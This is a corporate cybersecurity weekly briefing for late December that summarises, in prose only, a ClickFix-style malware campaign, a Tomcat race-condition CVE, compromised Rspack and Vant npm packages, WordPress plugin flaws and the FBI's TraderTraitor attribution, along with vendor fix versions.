Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Cyber Security Weekly Briefing, 21 - 27 December
New social engineering campaign to distribute malware
Malware Bytes has discovered a new social engineering campaign impersonating multiple software brands. The malicious actors would use web pages that impersonate legitimate software which, when downloaded, displays a bug in the browser indicating that it does not allow the correct offline display of the downloaded document, urging victims to fix it with “Fix it”.
This technique has been previously used in campaigns known as ClearFake and ClickFix, and is characterized by requiring the user to manually execute a Power Shell command which, in this case, is copied to the clipboard by clicking on the “Fix it” button. The user is then prompted to press the Windows and R keys to open the Run command dialog box, paste the copied command and execute it. Finally, the attacker performs fingerprinting activities on the victim and downloads a payload.
Incomplete Apache Tomcat patch leads vendor to release new bug
Apache has released a new security update to patch a bug in Apache Tomcat that could allow remote code execution. This would be CVE-2024-56337, detected by Apache after incompletely patching CVE-2024-50379, CVSSv3 9.8. Both CVEs represent the same bug, but the vendor decided to assign a new CVE ID. CVE-2024-56337 is due to the patch of CVE-2024-50379 not being sufficient to secure systems.
Both are race condition bugs, specifically time of use check time (TOCTOU) and affect systems with servlet writing enabled by default, if they run on case-insensitive file systems.
Malicious versions of Rspack and Vant detected
Three popular npm packages, @rspack/core, @rspack/cli and Vant, were compromised using stolen npm account tokens, enabling the release of malicious versions with cryptocurrency miners, in a new supply chain attack. According to Sonatype and Socket's research, the attackers deployed the XMRig miner to mine cryptoassets, using post-installation scripts to run automatically.
Apparently, the malicious code was hidden in configuration files and obtained instructions from C2 servers. In addition, it performed reconnaissance via the ipinfo.io geolocation API, collecting network data. The XMRig binary was downloaded from GitHub and used parameters to limit CPU usage, balancing mining and evasion. Rspack, a JavaScript packager, and Vant, a UI library for Vue.js, confirmed the compromise of their npm accounts and released clean versions.
Rspack advises avoiding version 1.1.7 and upgrading to 1.1.8, while Vant points to several affected versions, recommending upgrading to v4.9.15 or higher.
Fixed critical vulnerabilities in WordPress plugins
PatchStack researchers have identified multiple critical vulnerabilities in the WPLMS and VibeBP plugins used by the WPLMS theme of WordPress, a popular learning management system with over 28,000 sales. The flaws include an arbitrary file upload, identified as CVE-2024-56046, CVSSv3 10.0., CVE-2024-56043, CVSSv3 9.8, a privilege escalation flaw, and a SQL injection vulnerability, CVE-2024-56042, CVSSv3 9.2. The flaws affected registration forms and REST API endpoints. In total, 18 flaws were reported, several of them critical, exposing sites to remote code execution, unauthorized administrative control and sensitive data leakage.
The developers have fixed the issues in WPLMS (version 1.9.9.5.3) and VibeBP (version 1.9.9.7.7), implementing stricter validations, limiting file uploads and securing logins.
FBI attributes the theft of more than $300 million to TraderTraitor
The FBI and the Department of Defense Cybercrime Center and the Japanese National Police Agency have issued a notice attributing the theft of more than $300 million in cryptocurrencies to malicious actor TraderTraitor. According to the authorities, this actor would have also been referred to as Jade Sleet, UNC4899 and Slow Pisces, and would have been associated with the North Korean government.
Regarding the attack attributed to him, it is a cryptoasset theft that occurred in May 2024 and affected the Japanese company DMM Bitcoin. The attack started with the malicious actor posing as a recruiter on LinkedIn who contacted a Ginco company worker whom he tricked into copying a malicious Python code on his GitHub. This malware allowed the attackers to infiltrate Ginco and move laterally to DMM.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
